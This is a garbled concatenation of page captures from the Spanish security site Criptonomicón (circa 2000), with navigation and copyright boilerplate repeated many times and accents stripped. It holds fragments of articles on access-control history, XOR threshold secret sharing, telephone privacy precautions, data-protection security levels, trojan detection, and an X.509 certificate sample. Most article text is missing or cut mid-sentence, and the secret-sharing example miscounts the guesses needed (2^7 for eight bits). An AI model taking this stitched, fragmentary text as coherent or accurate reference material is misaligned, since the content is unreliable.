Criptonomicn es un servicio ofrecido libremente desde el Instituto de Fsica Aplicada del CSIC. Para informacin sobre
privacidad, por favor consulte la declaracin de poltica sobre privacidad. Para sugerencias, comentarios o quejas, acuda al libro de
visitas. Para contribuir al Criptonomicn, lea la pgina de contribuciones.
Suscripcin gratis
Intimidad?
Artculos
Seguridad
Linux
Navegacin segura
Control de acceso
CGI
Java
JavaScript
Cookies
Crashes
Agujeros
Spam
Remailers
Anonimato
Correo seguro
Web seguro
Referencias
Por ltimo, plantate la siguiente pregunta: Realmente te merece la pena enviar una
postal con cdigo ejecutable? No puedes felicitar las fiestas con un texto?
Libro de Visitas
Feliz Navidad!
Participa con tus consejos y trucos
Tienes algn consejo o truco que te gustara compartir con otros usuarios?
Envamelo y aparecer publicado con tu nombre.
Copyright 1997-1999 Gonzalo lvarez Maran, CSIC. Todos los derechos reservados.
Criptonomicn es un servicio ofrecido libremente desde el Instituto de Fsica Aplicada del CSIC. Para informacin sobre
privacidad, por favor consulte la declaracin de poltica sobre privacidad. Para sugerencias, comentarios o quejas, acuda al libro de
visitas. Para contribuir al Criptonomicn, lea la pgina de contribuciones.
Consejos para
administradores
Consejos para
usuarios
Copyright 1997-1999 Gonzalo lvarez Maran, CSIC. Todos los derechos reservados.
Criptonomicn es un servicio ofrecido libremente desde el Instituto de Fsica Aplicada del CSIC. Para informacin sobre
privacidad, por favor consulte la declaracin de poltica sobre privacidad. Para sugerencias, comentarios o quejas, acuda al libro de
visitas. Para contribuir al Criptonomicn, lea la pgina de contribuciones.
Consejos para
administradores
Consejos para
usuarios
Copyright 1997-1999 Gonzalo lvarez Maran, CSIC. Todos los derechos reservados.
Criptonomicn es un servicio ofrecido libremente desde el Instituto de Fsica Aplicada del CSIC. Para informacin sobre
privacidad, por favor consulte la declaracin de poltica sobre privacidad. Para sugerencias, comentarios o quejas, acuda al libro de
visitas. Para contribuir al Criptonomicn, lea la pgina de contribuciones.
Comercio electrnico
Criptologa y seguridad
ndice temtico
Cuestiones legales
Intimidad y privacidad
Virus
Artculos publicados
Puedes consultarlos por temas, o tambin por orden de aparicin en el boletn.
Copyright 1997-2000 Gonzalo lvarez Maran, CSIC. Todos los derechos reservados.
Criptonomicn es un servicio ofrecido libremente desde el Instituto de Fsica Aplicada del CSIC. Para informacin sobre
privacidad, por favor consulte la declaracin de poltica sobre privacidad. Para sugerencias, comentarios o quejas, acuda al libro de
visitas. Para contribuir al Criptonomicn, lea la pgina de contribuciones.
Comercio electrnico
Criptologa y seguridad
Cuestiones legales
Desde esta pgina puedes acceder a los artculos publicados en el Boletn del
Criptonomicn en la seccin Hablan los expertos. Estn agrupados por orden de
aparicin en el boletn, siendo los ms recientes los que se listan a la cabeza:
Control de accesos
Intimidad y privacidad
Virus
Marcas de agua
El azar en la criptografa
Conocimiento Nulo
Cortafuegos
Criptografa visual
Esquemas umbrales
Comparativa de antivirus
Artculos publicados
Puedes consultarlos por temas, o tambin por orden de aparicin en el boletn.
Copyright 1997-2000 Gonzalo lvarez Maran, CSIC. Todos los derechos reservados.
Criptonomicn es un servicio ofrecido libremente desde el Instituto de Fsica Aplicada del CSIC. Para informacin sobre
privacidad, por favor consulte la declaracin de poltica sobre privacidad. Para sugerencias, comentarios o quejas, acuda al libro de
visitas. Para contribuir al Criptonomicn, lea la pgina de contribuciones.
Control de accesos
Comercio electrnico
Criptologa y seguridad
Cuestiones legales
Intimidad y privacidad
Virus
Control de accesos
Control de accesos
Control de accesos
rase una vez una poca en la que todo era mucho ms simple. El
mainframe era la pieza angular de los sistemas de informacin (algo que, en
muchos casos, sigue teniendo vigencia). Ya en 1976 IBM lanza RACF
(Resource Access Control Facility), sistema de seguridad que, pese a su
espartana simplicidad inicial, evolucion, revolucionando la concepcin
sobre los sistemas de control de accesos. Casi al tiempo, surgieron otros
productos de seguridad anlogos, como CA-ACF2, TopSecret, y un largo
etctera.
Unix se encontraba en sus balbucientes inicios. Su seguridad se basaba en
el modelo DAC simple, donde en esencia los recursos podan leerse,
escribirse y ejecutarse, y donde se concedan permisos para el propietario,
para el grupo y para el resto de usuarios del sistema.
La 'Edad de Bronce': Sistemas distribuidos
Y es cuando hace su aparicin la informtica distribuida. Se empieza a
hablar de cliente/servidor. Se introduce el concepto de middleware
transaccional. Las bases de datos relacionales implementan controles de
acceso a datos basados en perfiles de usuario o roles, con sistemas
bastante sofisticados. Aparece DCE como plataforma de informtica
distribuida, donde el servicio de seguridad se basa en una autenticacin
distribuida (Kerberos) y la emisin de certificados de atributos de privilegio
(tickets que encierran los atributos de autorizacin de un principal DCE).
DCE, pese a su elegante diseo en cuanto a seguridad, no cobra la difusin
que merece (debido a su fama de complejo). En informtica distribuida,
estamos en el punto de no retorno: Hay ya demasiados sistemas de
seguridad heterogneos como para pensar en integrarlos en una nica
infraestructura de seguridad, sea DCE o no.
Aparecen en la industria soluciones que prometen, adems de facilidades
como Sign-On nico o administracin centralizada de la seguridad, un primer
control de accesos a las aplicaciones corporativas. Estos sistemas, que se
interponen entre los usuarios y los sistemas de seguridad de los diferentes
componentes de una aplicacin distribuida, aportan ms a la facilidad de
administracin de seguridad y la conveniencia de los usuarios (lo cual no es
poco) que a la seguridad en s misma. Aparecen perfiles especficos del
estndar GSS-API, como SESAME, respuesta europea a DCE, que a
menudo conforman la infraestructura en la que se apoyan este tipo de
productos.
La gestin distribuida de permisos cobra relevancia. Los datos de control de
accesos (permisos, ACLs) se almacenan localmente, pero deben ser
gestionados de forma centralizada. Aparecen una nueva clase de
herramientas, directamente encaminadas no ya a proporcionar seguridad,
sino a facilitar la administracin de los mltiples sistemas de seguridad
existentes.
Control de accesos
Control de accesos
Control de accesos
Control de accesos
Informacin adicional
Control de acceso
Artculos publicados
Puedes consultarlos por temas, o tambin por orden de aparicin en el boletn.
Enviar a un amigo
Si consideras que este artculo puede interesarle a alguien que conozcas, puedes
envirselo por correo electrnico. No tienes ms que indicar la direccin del
destinatario, el asunto y tu nombre.
E-mail destino:
Control de accesos
Asunto:
Tu nombre:
Enviar
Borrar
Copyright 1997-2000 Gonzalo lvarez Maran, CSIC. Todos los derechos reservados.
Criptonomicn es un servicio ofrecido libremente desde el Instituto de Fsica Aplicada del CSIC. Para informacin sobre
privacidad, por favor consulte la declaracin de poltica sobre privacidad. Para sugerencias, comentarios o quejas, acuda al libro de
visitas. Para contribuir al Criptonomicn, lea la pgina de contribuciones.
Comercio electrnico
Criptologa y seguridad
Cuestiones legales
Intimidad y privacidad
Virus
Informacin adicional
Artculos publicados
Puedes consultarlos por temas, o tambin por orden de aparicin en el boletn.
Enviar a un amigo
Si consideras que este artculo puede interesarle a alguien que conozcas, puedes
envirselo por correo electrnico. No tienes ms que indicar la direccin del
destinatario, el asunto y tu nombre.
E-mail destino:
Asunto:
Tu nombre:
Enviar
Borrar
Copyright 1997-2000 Gonzalo lvarez Maran, CSIC. Todos los derechos reservados.
Criptonomicn es un servicio ofrecido libremente desde el Instituto de Fsica Aplicada del CSIC. Para informacin sobre
privacidad, por favor consulte la declaracin de poltica sobre privacidad. Para sugerencias, comentarios o quejas, acuda al libro de
visitas. Para contribuir al Criptonomicn, lea la pgina de contribuciones.
Suscripcin gratis
Intimidad?
Artculos
Seguridad
Linux
Control de acceso
CGI
Java
JavaScript
Cookies
Crashes
Agujeros
Spam
Remailers
Anonimato
Correo seguro
Web seguro
Referencias
Libro de Visitas
Informacin adicional
Comercio electrnico
Se pueden leer otros artculos desde la pgina principal de Susurros desde la Cripta.
Enviar a un amigo
Si consideras que este artculo puede interesarle a alguien que conozcas, puedes
envirselo por correo electrnico. No tienes ms que indicar la direccin del
destinatario, el asunto y tu nombre.
E-mail destino:
Asunto:
Tu nombre:
Enviar
Borrar
Copyright 1997-1999 Gonzalo lvarez Maran, CSIC. Todos los derechos reservados.
Criptonomicn es un servicio ofrecido libremente desde el Instituto de Fsica Aplicada del CSIC. Para informacin sobre
privacidad, por favor consulte la declaracin de poltica sobre privacidad. Para sugerencias, comentarios o quejas, acuda al libro de
visitas. Para contribuir al Criptonomicn, lea la pgina de contribuciones.
Marcas de agua
Comercio electrnico
Criptologa y seguridad
Marcas de agua
Cuestiones legales
Intimidad y privacidad
Virus
Marcas de agua
Marcas de agua
Marcas de agua
Marcas de agua
Informacin adicional
Criptografa visual
Artculos publicados
Puedes consultarlos por temas, o tambin por orden de aparicin en el boletn.
Enviar a un amigo
Si consideras que este artculo puede interesarle a alguien que conozcas, puedes
envirselo por correo electrnico. No tienes ms que indicar la direccin del
destinatario, el asunto y tu nombre.
E-mail destino:
Asunto:
Tu nombre:
Enviar
Borrar
Copyright 1997-2000 Gonzalo lvarez Maran, CSIC. Todos los derechos reservados.
Criptonomicn es un servicio ofrecido libremente desde el Instituto de Fsica Aplicada del CSIC. Para informacin sobre
privacidad, por favor consulte la declaracin de poltica sobre privacidad. Para sugerencias, comentarios o quejas, acuda al libro de
visitas. Para contribuir al Criptonomicn, lea la pgina de contribuciones.
Comercio electrnico
Criptologa y seguridad
Cuestiones legales
Intimidad y privacidad
Virus
Informacin adicional
Marcas de agua
Digimarc
Veridicom
Mediasec
Enlaces en Webreference.com
Artculos publicados
file:///C|/TEMP/criptonomicon/criptonomicon/articulos/expertos34.html (2 of 3) [25/10/2000 02:30:54 p.m.]
Borrar
Copyright 1997-2000 Gonzalo lvarez Maran, CSIC. Todos los derechos reservados.
Criptonomicn es un servicio ofrecido libremente desde el Instituto de Fsica Aplicada del CSIC. Para informacin sobre
privacidad, por favor consulte la declaracin de poltica sobre privacidad. Para sugerencias, comentarios o quejas, acuda al libro de
visitas. Para contribuir al Criptonomicn, lea la pgina de contribuciones.
Criptografa visual
Comercio electrnico
Criptologa y seguridad
Criptografa visual
Cuestiones legales
Intimidad y privacidad
Virus
Criptografa visual
Criptografa visual
Criptografa visual
Criptografa visual
Criptografa visual
Criptografa visual
Criptografa visual
Criptografa visual
Informacin adicional
Artculos publicados
Puedes consultarlos por temas, o tambin por orden de aparicin en el boletn.
Enviar a un amigo
Si consideras que este artculo puede interesarle a alguien que conozcas, puedes
envirselo por correo electrnico. No tienes ms que indicar la direccin del
destinatario, el asunto y tu nombre.
E-mail destino:
Asunto:
Tu nombre:
Enviar
Borrar
Copyright 1997-2000 Gonzalo lvarez Maran, CSIC. Todos los derechos reservados.
Criptonomicn es un servicio ofrecido libremente desde el Instituto de Fsica Aplicada del CSIC. Para informacin sobre
privacidad, por favor consulte la declaracin de poltica sobre privacidad. Para sugerencias, comentarios o quejas, acuda al libro de
visitas. Para contribuir al Criptonomicn, lea la pgina de contribuciones.
Esquemas umbrales
Comercio electrnico
Criptologa y seguridad
Esquemas umbrales
Cuestiones legales
Intimidad y privacidad
Virus
Esquemas umbrales
ha dividido el secreto.
2. Cualesquiera m participantes pueden determinar el valor del secreto sin
ms que compartir las sombras que cada uno de ellos posee.
3. Ningn grupo de m-1 participantes, o menos, puede conocer ninguna
informacin sobre el valor secreto.
En estos esquemas el director lleva a cabo el proceso de dividir el secreto en
las n sombras y entrega, secretamente, cada una de las sombras a cada uno
de los participantes.
Para conocer cmo trabajan los esquemas umbrales, vamos a presentar un
ejemplo de cmo construir un esquema umbral 2 de 2, donde el secreto es
una cadena de bits. En este caso, el secreto debe romperse en 2 sombras,
de modo que cada una de ellas estar formada por una coleccin de bits, y
ser necesaria la colaboracin de las dos partes para recuperar el secreto
original.
Supongamos que el secreto elegido por el Director es la siguiente cadena de
bits: S=(01001010). El director elabora la primera de las sombras de forma
aleatoria: s1=(11001101). Para construir la segunda sombra, el director
utiliza la siguiente tabla de sumar:
0 + 0 = 0, 0 + 1 = 1, 1 + 0 = 1 y 1 + 1 = 0 (la tabla de sumar mdulo 2).
Como se cumple que:
0 + 1 = 1, 1 + 1 = 0, 0 + 0 = 0, 0 + 0 = 0, 1 + 1 = 0, 0 + 1 = 1, 1 + 0 = 1 y 0 + 1
= 1,
la segunda sombra es: s2=(10000111).
Para recuperar el secreto, basta con que los dos participantes pongan en
comn sus dos sombras y las sumen, bit a bit:
1 + 1 = 0, 1 + 0 = 1, 0 + 0 = 0, 0 + 0 = 0, 1 + 0 = 1, 1 + 1 = 0, 0 + 1 = 1 y 1 + 1
= 0,
lo que proporciona el valor secreto original: S=(01001010).
Si uno de los participantes quisiera recuperar el secreto original utilizando
slo su sombra, debera suponer cul es la sombra del otro participante.
Para ello necesitara probar, en el ejemplo anterior, un total de 2^7 = 128
posibilidades (dos valores, 0 y 1, a colocar en 7 posiciones), lo cual debera
empujarle a desistir de tal intento.
El ejemplo del esquema umbral anterior puede extenderse a esquemas ms
generales, del tipo 2 de n y del tipo m de n, pero en este caso las bases
matemticas necesarias son un poco ms complejas y no sern comentadas
aqu.
Esquemas umbrales
Informacin adicional
Artculos publicados
Puedes consultarlos por temas, o tambin por orden de aparicin en el boletn.
Enviar a un amigo
Si consideras que este artculo puede interesarle a alguien que conozcas, puedes
envirselo por correo electrnico. No tienes ms que indicar la direccin del
destinatario, el asunto y tu nombre.
E-mail destino:
Asunto:
Tu nombre:
Enviar
Borrar
Copyright 1997-2000 Gonzalo lvarez Maran, CSIC. Todos los derechos reservados.
Criptonomicn es un servicio ofrecido libremente desde el Instituto de Fsica Aplicada del CSIC. Para informacin sobre
privacidad, por favor consulte la declaracin de poltica sobre privacidad. Para sugerencias, comentarios o quejas, acuda al libro de
visitas. Para contribuir al Criptonomicn, lea la pgina de contribuciones.
Comercio electrnico
Criptologa y seguridad
Cuestiones legales
Intimidad y privacidad
Introduccin
Virus
Informacin adicional
Artculos publicados
Puedes consultarlos por temas, o tambin por orden de aparicin en el boletn.
Enviar a un amigo
Si consideras que este artculo puede interesarle a alguien que conozcas, puedes
envirselo por correo electrnico. No tienes ms que indicar la direccin del
destinatario, el asunto y tu nombre.
E-mail destino:
Asunto:
Tu nombre:
Enviar
Borrar
Copyright 1997-2000 Gonzalo lvarez Maran, CSIC. Todos los derechos reservados.
Criptonomicn es un servicio ofrecido libremente desde el Instituto de Fsica Aplicada del CSIC. Para informacin sobre
privacidad, por favor consulte la declaracin de poltica sobre privacidad. Para sugerencias, comentarios o quejas, acuda al libro de
visitas. Para contribuir al Criptonomicn, lea la pgina de contribuciones.
Comercio electrnico
Criptologa y seguridad
Cuestiones legales
Intimidad y privacidad
Virus
Informacin adicional
Artculos publicados
Puedes consultarlos por temas, o tambin por orden de aparicin en el boletn.
Enviar a un amigo
Si consideras que este artculo puede interesarle a alguien que conozcas, puedes
envirselo por correo electrnico. No tienes ms que indicar la direccin del
destinatario, el asunto y tu nombre.
E-mail destino:
Asunto:
Tu nombre:
Enviar
Borrar
Copyright 1997-2000 Gonzalo lvarez Maran, CSIC. Todos los derechos reservados.
Criptonomicn es un servicio ofrecido libremente desde el Instituto de Fsica Aplicada del CSIC. Para informacin sobre
privacidad, por favor consulte la declaracin de poltica sobre privacidad. Para sugerencias, comentarios o quejas, acuda al libro de
visitas. Para contribuir al Criptonomicn, lea la pgina de contribuciones.
Comercio electrnico
Criptologa y seguridad
Cuestiones legales
Intimidad y privacidad
Virus
Y todo sin que seamos conscientes de ello: la mayora de las veces, las
indiscreciones por nuestra parte no son ms que respuestas, aparentemente
intranscendentes, a indiscreciones ajenas.
Tengamos presente, adems, que comunicar determinados detalles o
informaciones es la mejor forma de crear confianza en nuestros
interlocutores. Dejar que terceros conozcan estos detalles les permite crear
la apariencia de una condicin que nunca hemos querido darles.
4.- Uso del telfono
La comodidad que representa el telfono hace que por el mismo circule la
mayor parte de la informacin que conocemos. No obstante, es un sistema
de comunicacin altamente vulnerable: se puede pinchar en todo el recorrido
de la lnea (tanto interna como externa), el emisor se puede alimentar de la
propia lnea y la escucha se puede realizar a distancia con total impunidad.
Obviamente, no puede usted prescindir del telfono, pero s tomar una serie
de precauciones que inutilicen en gran medida todo intento de intromisin.
- - Nunca utilice lneas directas al exterior. Aunque su extensin tenga
asignado un determinado nmero entrante, haga programar la centralita para
que la asignacin de lneas salientes sea aleatoria. De esta forma, para
acceder a sus comunicaciones desde el exterior ser preciso pinchar todos
los enlaces de la empresa.
- - En la medida de lo posible, haga instalar lneas RDSI, o similares de
transmisin de seal digital. Aunque existen equipos capaces de interceptar
dichas lneas, su disponibilidad es mucho menor que los de lneas
analgicas (pero el que disponga de tecnologa adecuada, podr hacerle
multitud de ataques, imposibles en las lneas analgicas)
- - Sea especialmente reservado cuando utilice telfonos mviles (incluidos
los GSM). Es el sistema ms vulnerable y que ofrece mayor impunidad. Evite
dar nombres o datos cuando hable por el mvil y limite su uso a casos de
estricta necesidad. No facilite su nmero mvil ms que a su secretaria de
confianza, responsable de seguridad y personal directivo: en caso de
necesidad, su secretaria puede transferirle directamente las llamadas
urgentes recibidas en su oficina. Active la ocultacin del nmero propio (slo
posible en GSM). Utilice un telfono o tarjeta independiente para asuntos
personales. Debe saber, adems, que el GSM, informa al sistema del lugar
geogrfico en que usted se encuentra, simplemente por el hecho de estar
conectado.
- - En momentos de especial sensibilidad de los asuntos que deba tratar,
adquiera para su telfono mvil una tarjeta pre-pago, adquirida en efectivo.
Posteriormente, desviamos nuestro nmero habitual al nuevo, y la gente que
nos llame, no tendr que saber el nmero donde se ha desviado. La tarjeta
es el nico identificador del equipo y, sin poderla vincular a travs de pagos
Informacin adicional
www.spyzone.com
www.loyola-edu/dept/politics/ecintel.html
www.spysite.com
www.mai-assoc.com
www.cb-security.com
Artculos publicados
Borrar
Copyright 1997-2000 Gonzalo lvarez Maran, CSIC. Todos los derechos reservados.
Criptonomicn es un servicio ofrecido libremente desde el Instituto de Fsica Aplicada del CSIC. Para informacin sobre
privacidad, por favor consulte la declaracin de poltica sobre privacidad. Para sugerencias, comentarios o quejas, acuda al libro de
visitas. Para contribuir al Criptonomicn, lea la pgina de contribuciones.
Comercio electrnico
Criptologa y seguridad
Cuestiones legales
Intimidad y privacidad
Virus
de datos.
Esto que parece sencillo para empresas de cierto tamao, puede no serlo
tanto para las pequeas empresas, autnomos y profesionales liberales.
Este colectivo supone ni ms ni menos que el 90% del tejido empresarial
espaol. La gran empresa confiar este asunto a su departamento de
asesora legal o subcontratar los servicios de una asesora externa, pero
qu ocurrir con el milln y medio de pequeas empresas? tendrn
capacidad para hacer cumplir la normativa o simplemente debern
abandonar la practica comn de realizar sus pequeos mailings peridicos
para sostener sus empresas?, se les juzgar con el mismo patrn que a las
empresas grandes?.
Nivel de seguridad medio
Adems del cumplimiento de las medidas de nivel bsico, el nivel de
seguridad medio, implica realizar una auditora (interna o externa) que
verifique el cumplimiento del reglamento, establecer un control de acceso
fsico a los locales donde se encuentran ubicados los sistemas de
informacin, y nombrar un responsable de seguridad, el cual coordinar y
controlar las medidas descritas en el documento de seguridad. Otra
obligacin propia de este nivel es la de establecer sistemas de identificacin
y autenticacin en relacin con el acceso a los sistemas informticos y el
establecimiento de un sistema de registro de entrada y salida de soportes
informticos.
A diferencia de las medidas de nivel bsico el plazo de implantacin de estas
medidas es de doce meses, es decir, debern estar implantadas antes del
26 de junio del 2000.
Nivel de seguridad alto
Debido a la naturaleza sensible de los datos personales propios de este nivel
se debern adoptar unas medidas de seguridad aparentemente mucho ms
restrictivas. Por ejemplo, las copias de seguridad deben custodiarse en un
lugar distinto al lugar de ubicacin de los soportes informticos y los
sistemas informticos deben registrar puntualmente todos los accesos. En
cuanto al transporte de la informacin se requerir una autorizacin firmada
del responsable de seguridad y se proceder a la encriptacin de los datos
para evitar que sean capturados durante el trasiego telemtico. Para una
correcta implantacin de estas medidas de nivel alto ser necesaria la
implantacin de una infraestructura de clave pblica en donde se garanticen
los principios de intimidad, autenticacin y confidencialidad. Siendo por tanto
crucial el desarrollo de las autoridades de certificacin o terceras partes de
confianza, y el de las Firmas digitales que influirn de forma positiva al
correcto desarrollo de estas medidas de seguridad.
Estas medidas de seguridad pueden ser para empresas como los,
sindicatos, partidos polticos o asociaciones de carcter religioso o sexual,
file:///C|/TEMP/criptonomicon/criptonomicon/articulos/expertos57.html (3 of 5) [25/10/2000 02:30:59 p.m.]
Informacin adicional
Artculos publicados
Puedes consultarlos por temas, o tambin por orden de aparicin en el boletn.
Enviar a un amigo
Si consideras que este artculo puede interesarle a alguien que conozcas, puedes
envirselo por correo electrnico. No tienes ms que indicar la direccin del
destinatario, el asunto y tu nombre.
E-mail destino:
Asunto:
Tu nombre:
Enviar
Borrar
Copyright 1997-2000 Gonzalo lvarez Maran, CSIC. Todos los derechos reservados.
Criptonomicn es un servicio ofrecido libremente desde el Instituto de Fsica Aplicada del CSIC. Para informacin sobre
privacidad, por favor consulte la declaracin de poltica sobre privacidad. Para sugerencias, comentarios o quejas, acuda al libro de
visitas. Para contribuir al Criptonomicn, lea la pgina de contribuciones.
Comercio electrnico
Criptologa y seguridad
Cuestiones legales
Intimidad y privacidad
Virus
cualquier utilidad que queramos para nuestro ordenador. Pero hay que tener
un poco de cuidado, cualquier programa que descarguemos puede contener
un virus o un troyano.
Pero que es un troyano? Es sencillamente un programa que oculta dentro
otro programa potencialmente peligroso para nuestro ordenador y que, de no
ir disimulado en otro, probablemente nunca instalaramos en nuestro PC. Al
intentar ejecutar esa utilidad que tantas ganas tenamos de obtener y que
por fin hemos conseguido encontrar en Internet, no funciona correctamente (
esto es una generalidad pero no es as en el 100% de los casos ) y para
colmo hemos infectado nuestro ordenador.
Al igual que en la ciudad de Troya ... hemos metido al enemigo dentro de
nuestro ordenador, en un bello envoltorio, y dejado a este a merced de la
persona que escribi el troyano.
Los ltimos troyanos aparecidos permiten a terceras personas tomar el
control TOTAL de nuestro ordenador de forma remota, pueden escribir,
borrar, cambiar archivos, configuraciones ... etc., al igual que nosotros
mismos delante de nuestra pantalla.
En estos programas, a diferencia de los virus, su fin no es reproducirse. Por
tanto, la mayora de los scaners heursticos de los antivirus no detectan
estos programas como peligrosos a menos que hayan sido actualizados
convenientemente.
Bueno ... y qu puedo hacer para saber si el programa que acabo de
ejecutar es un troyano o no?. Daremos unas pequeas pautas generales
para intentar descubrir si oculta o no un troyano.
1. Comprobar la nueva aparicin de DLLs o EXEs en c:\windows o
c:\windows\system. Hay diversos mtodos. Uno de ellos es usar find con la
opcin de bsqueda por fecha de modificacin o creacin. Otra es usar
ya que suele ser el lugar escogido por la mayora de troyanos para instalar
una clave que apunte al fichero que quieren que se ejecute cada vez que se
reinicia Windows. En cualquier caso, tambin nos ser de gran ayuda la
utilidad gratuita RegMon, que ayuda a monitorizar cualquier cambio en el
Registry de Windows.
Por ltimo, no est de ms recordar que existen herramientas creadas
especialmente para la deteccin/eliminacin de troyanos. Aunque muchos
antivirus hoy en da detectan y eliminan muchos troyanos, la proteccin que
ofrecen no puede considerarse, en ningn caso, suficiente. Las herramientas
anti-troyanos especficas, aunque an tienen mucho que mejorar, son en
general muy superiores con respecto a los antivirus. Mencionaremos dos de
ellas: Jammer 1.7, que tiene una versin freeware y LockDown2000.
Publicado en el Boletn del Criptonomicn #56.
Alfonso Lzaro Tllez y Julio Csar son consultores de IP6Seguridad.
Informacin adicional
Artculos publicados
Puedes consultarlos por temas, o tambin por orden de aparicin en el boletn.
Enviar a un amigo
Si consideras que este artculo puede interesarle a alguien que conozcas, puedes
envirselo por correo electrnico. No tienes ms que indicar la direccin del
destinatario, el asunto y tu nombre.
E-mail destino:
Asunto:
Tu nombre:
Enviar
Borrar
Copyright 1997-2000 Gonzalo lvarez Maran, CSIC. Todos los derechos reservados.
Criptonomicn es un servicio ofrecido libremente desde el Instituto de Fsica Aplicada del CSIC. Para informacin sobre
privacidad, por favor consulte la declaracin de poltica sobre privacidad. Para sugerencias, comentarios o quejas, acuda al libro de
visitas. Para contribuir al Criptonomicn, lea la pgina de contribuciones.
Comercio electrnico
Criptologa y seguridad
Cuestiones legales
Intimidad y privacidad
Virus
Informacin adicional
Artculos publicados
Puedes consultarlos por temas, o tambin por orden de aparicin en el boletn.
Enviar a un amigo
Si consideras que este artculo puede interesarle a alguien que conozcas, puedes
envirselo por correo electrnico. No tienes ms que indicar la direccin del
destinatario, el asunto y tu nombre.
E-mail destino:
Asunto:
Tu nombre:
Enviar
Borrar
Comercio electrnico
Criptologa y seguridad
Cuestiones legales
Intimidad y privacidad
Virus
Informacin adicional
Zona ENFOPOL
Artculos publicados
Puedes consultarlos por temas, o tambin por orden de aparicin en el boletn.
Enviar a un amigo
Si consideras que este artculo puede interesarle a alguien que conozcas, puedes
envirselo por correo electrnico. No tienes ms que indicar la direccin del
destinatario, el asunto y tu nombre.
E-mail destino:
Asunto:
Tu nombre:
Enviar
Borrar
Copyright 1997-2000 Gonzalo lvarez Maran, CSIC. Todos los derechos reservados.
Criptonomicn es un servicio ofrecido libremente desde el Instituto de Fsica Aplicada del CSIC. Para informacin sobre
privacidad, por favor consulte la declaracin de poltica sobre privacidad. Para sugerencias, comentarios o quejas, acuda al libro de
visitas. Para contribuir al Criptonomicn, lea la pgina de contribuciones.
Suscripcin gratis
Intimidad?
Artculos
Seguridad
Linux
Navegacin segura
Control de acceso
CGI
Java
JavaScript
Cookies
Crashes
Agujeros
Spam
Remailers
Anonimato
Correo seguro
Web seguro
Referencias
Libro de Visitas
Informacin adicional
Borrar
Copyright 1997-1999 Gonzalo lvarez Maran, CSIC. Todos los derechos reservados.
Criptonomicn es un servicio ofrecido libremente desde el Instituto de Fsica Aplicada del CSIC. Para informacin sobre
privacidad, por favor consulte la declaracin de poltica sobre privacidad. Para sugerencias, comentarios o quejas, acuda al libro de
visitas. Para contribuir al Criptonomicn, lea la pgina de contribuciones.
Comercio electrnico
Criptologa y seguridad
Cuestiones legales
Intimidad y privacidad
Virus
Informacin adicional
Artculos publicados
Puedes consultarlos por temas, o tambin por orden de aparicin en el boletn.
Enviar a un amigo
Si consideras que este artculo puede interesarle a alguien que conozcas, puedes
envirselo por correo electrnico. No tienes ms que indicar la direccin del
destinatario, el asunto y tu nombre.
E-mail destino:
Asunto:
Tu nombre:
Enviar
Borrar
Copyright 1997-2000 Gonzalo lvarez Maran, CSIC. Todos los derechos reservados.
Criptonomicn es un servicio ofrecido libremente desde el Instituto de Fsica Aplicada del CSIC. Para informacin sobre
privacidad, por favor consulte la declaracin de poltica sobre privacidad. Para sugerencias, comentarios o quejas, acuda al libro de
visitas. Para contribuir al Criptonomicn, lea la pgina de contribuciones.
El azar en la criptografa
Comercio electrnico
Criptologa y seguridad
El azar en la criptografa
Cuestiones legales
Intimidad y privacidad
Virus
El azar en la criptografa
El azar en la criptografa
Informacin adicional
Artculos publicados
Puedes consultarlos por temas, o tambin por orden de aparicin en el boletn.
Enviar a un amigo
Si consideras que este artculo puede interesarle a alguien que conozcas, puedes
envirselo por correo electrnico. No tienes ms que indicar la direccin del
destinatario, el asunto y tu nombre.
E-mail destino:
Asunto:
El azar en la criptografa
Tu nombre:
Enviar
Borrar
Copyright 1997-2000 Gonzalo lvarez Maran, CSIC. Todos los derechos reservados.
Criptonomicn es un servicio ofrecido libremente desde el Instituto de Fsica Aplicada del CSIC. Para informacin sobre
privacidad, por favor consulte la declaracin de poltica sobre privacidad. Para sugerencias, comentarios o quejas, acuda al libro de
visitas. Para contribuir al Criptonomicn, lea la pgina de contribuciones.
Comercio electrnico
Criptologa y seguridad
Cuestiones legales
Intimidad y privacidad
Virus
o entidades, por Ejemplo, cmo asegurarnos de que una clave pblica que hemos
encontrado en Internet pertenece realmente a quin dice pertenecer.
Una posible solucin es la utilizacin de un certificado digital que es fichero digital
intransferible y no modificable, emitido por una tercera parte de confianza (AC), que
asocia a una persona o entidad una clave pblica.
Un certificado digital que siga el standard X509v3, utilizado por los navegadores,
contiene la siguiente informacin:
Identificacin del titular del certificado: Nombre, direccin, etc.
Clave pblica del titular del certificado.
Fecha de validez.
Nmero de serie.
Identificacin del emisor del certificado.
Un ejemplo sera:
issuer: C=ES ST=L=Barcelona O=SECURITY ZUTANEZ OU=Division de
certificados CN=Fulano Menganez Email=Fulano@fulanez.es subject:
C=ES ST=O=OU=CN=Jaimito Email=Jaimito@jaimito serial:15
Certificate: Data: Version: 1 (0x0) Serial Number: 21 (0x15)
Signature Algorithm: md5WithRSAEncryption Issuer: C=ES
ST=L=Barcelona O=SECURITY ZUTANEZ OU=Division de certificados
CN=Fulano Menganez Email=Fulano@fulanez.es Validity Not Before:
Nov 18 15:15:31 1998 GMT Not After : Nov 13 15:15:31 1999 GMT
Subject: C=ES, ST=, O=, OU=, CN=Jaimito Email=Jaimito@jaimito
Subject Public Key Info: Public Key Algorithm: rsaEncryption RSA
Public Key: (1024 bit) Modulus (1024 bit):
00:9e:74:de:c9:1a:6b:f4:fe:d1:04:30:58:7e:8b:
51:7a:98:23:e9:45:a9:c2:a7:7c:f8:f8:b5:9a:a2:
ea:c1:99:68:ba:f7:c3:d8:06:05:1b:6a:47:a1:44:
5c:2c:a6:e0:4b:6f:ce:02:c4:06:32:20:34:be:13:
97:39:a3:aa:6f:2f:41:a7:bc:14:c8:f3:0c:ad:9d:
09:63:8a:f5:eb:60:5b:06:a6:01:fb:1a:07:b2:c6:
39:48:bb:b7:00:56:4e:20:6d:87:3f:67:0b:2f:f4:
b0:5f:74:7f:90:6b:b4:47:6f:56:1a:b5:c5:42:54:
9b:e5:e3:00:e2:4f:e3:14:47 Exponent: 65537 (0x10001) Signature
Algorithm: md5WithRSAEncryption
3b:2b:e9:ff:48:48:35:ab:30:5c:e2:d1:88:c9:29:8b:bc:09:
b2:58:80:17:9c:e7:08:0a:7d:8a:5e:46:a8:83:3b:ee:84:de:
62:e3:ea:51:cb:92:bc:fa:db:90:bd:cd:9f:25:d4:4a:48:63:
ac:b8:93:f9:dc:9c:cf:ef:fd:45
- -----BEGIN CERTIFICATE----MIICOzCCAeUCARUwDQYJKoZIhvcNAQEEBQAwgaYxCzAJBgNVBAYTAkVTMRIwEAYD
